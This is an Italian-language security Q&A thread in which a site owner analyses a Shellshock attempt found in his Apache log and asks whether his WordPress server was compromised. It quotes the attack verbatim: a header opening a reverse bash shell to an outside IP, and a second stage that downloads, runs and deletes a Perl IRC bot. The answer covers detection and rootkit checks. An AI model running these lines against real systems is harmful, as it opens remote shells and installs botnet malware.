Che cosa fa questo tentativo di exploit di Shellshock e il mio sito Web è stato compromesso?

8

Oggi ho sfruttato l'access.log di Apache per la famigerata stringa () { , e oltre a un mucchio di ciò che sembrava un ping per verificare quanti server sono vulnerabili, ho trovato questo tentativo, che sembrava un vero attacco:

94.23.193.131 - - [26/Sep/2014:05:48:53 +0200] "GET / HTTP/1.0" 200 29271 "-" "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"

Quello che ho fatto dopo è stato vedere cosa ha fatto quella connessione TCP; Ho cercato il risultato:

user@localhost:~# cat < /dev/tcp/195.225.34.101/3333
cat < /dev/tcp/195.225.34.101/3333
wget -O /tmp/.lCE-unix http://202.137.176.146/icons/xt.dat;perl /tmp/.lCE-unix 81.18.135.38 443;rm -rf /tmp/.lCE-unix;uptime

Se lo sto leggendo bene, imposterà uno script Perl ospitato su http://202.137.176.146/icons/xt.dat ( Copia dello script su Pastebin ), lo stampa su /tmp/.lCE-unix, lo esegue, quindi si rimuove da solo.

Guardando lo script stesso, quello che penso stia vedendo è che tenta di connettersi a un server IRC su IP 81.18.135.38, porta 443, usando una password di connessione 45QOhktzhwR4Ai, utente 'opus', quindi prova ad unirsi canale '## n3' (se ho ragione).

Devo ammettere che volevo solo condividerlo da qualche parte. Domande reali però:

  1. L'attacco è stato gestito da Apache, che probabilmente ha inoltrato la richiesta a Wordpress ospitata su /, una versione 3.x. Non penso che sia mai stato eseguito da Bash, ma qualcuno può confermarlo?
  2. Come posso verificare se l'attacco ha avuto successo? Ho eseguito comandi come netstat e lsof ma non sono riuscito a trovare nessuna delle connessioni ordinarie oltre alla mia sessione SSH, al server Web, ecc. Nessuna connessione a nessuno degli indirizzi IP dati, nessun processo Perl in esecuzione.
  3. È un exploit conosciuto? Non ho trovato molto in una ricerca, anche se c'è un thread sulla mailing list di Redhat del 2005 che sembra fare riferimento al file.
  4. Devo segnalare alcuni di questi indirizzi IP alle autorità? E se sì, quale? Posso immaginare l'FBI e chi non vorrebbe abbattere il server C & C a cui si fa riferimento.
posta fwielstra 26.09.2014 - 10:42
fonte

1 risposta

4
  1. Se usi il modulo apache php o fastcgi e non CGI, il parametro non arriva mai a bash. Anche se tu avessi usato CGI, sarebbe arrivato solo a bash se Wordpress in qualche modo usato avesse chiamato uno script di bash durante la sua esecuzione (qualcuno più esperto in Wordpress potrebbe dire la probabilità che ciò accada).
  2. È possibile monitorare le connessioni di rete sospette con lsof e netstat, ma se l'autore dell'attacco ha rilasciato un rootkit, potrebbe nascondersi da tali strumenti. Potresti controllare il tuo sistema portandolo offline, avviando da un supporto diverso e eseguendo alcuni controlli di integrità (debsum, rkhunter, ecc.). Per installare un rootkit, l'utente malintenzionato avrebbe bisogno anche di un exploit root locale, poiché questo attacco otterrebbe solo una shell per l'utente del server web.
  3. Scusa, non lo so, ma prendere i controlli da IRC è abbastanza comune per i bot AFAIK, quindi in senso generale sembra un attacco piuttosto comune applicato usando shellshock.
  4. Si potrebbe, e potrebbe essere utile anche se l'attaccante è un bot stesso (è probabile). Se si tratta di un nodo di uscita TOR, tuttavia, l'indirizzo IP non contiene alcuna informazione utile.
risposta data 26.09.2014 - 11:14
fonte

Leggi altre domande sui tag